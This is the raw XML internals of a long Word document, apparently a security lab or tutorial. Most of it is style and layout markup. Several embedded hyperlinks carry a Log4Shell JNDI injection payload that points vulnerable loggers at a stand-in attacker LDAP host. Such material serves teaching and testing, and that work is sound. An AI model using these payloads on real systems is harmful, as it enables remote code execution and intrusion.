      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00B11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385"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00B11385"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00544288"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00544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094973">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1085611504">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1564095773">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1074476095">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="929392832">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="69038770">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="706221361">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1658342810">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="597103870">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="1371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110993">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1423837990">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1163819549">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="726493967">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1360814581">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1298417758">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="551162640">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="2277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029330">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="522866681">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1406953007">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="274479544">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1550070448">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="322517088">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1228420187">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="352731506">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="296179285">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="1922447211">
                                      <w:marLeft w:val="0"/>
                                      <w:marRight w:val="0"/>
                                      <w:marTop w:val="0"/>
                                      <w:marBottom w:val="0"/>
                                      <w:divBdr>
                                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                      </w:divBdr>
                                      <w:divsChild>
                                        <w:div w:id="18702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762118">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="597519401">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1125923892">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1991326786">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1673145383">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="437406991">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="632831715">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="8614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575846">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="904292500">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1545212105">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1761639933">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1935939382">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212284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8.117.114.253:8080/log?message=\$%7bjndi:ldap://attacker.com:1389/a%7d" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/log?input=\$%7bjndi:ldap://attacker.com:1389/a%7d"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chiark.greenend.org.uk/~sgtatham/putty/latest.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8080/log?message=\$%7bjndi:ldap://attacker.com:1389/a%7d"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2355</TotalTime>
  <Pages>318</Pages>
  <Words>107620</Words>
  <Characters>613434</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>5111</Lines>
  <Paragraphs>1439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owais farid</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>owais farid</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T22:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-29T21:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>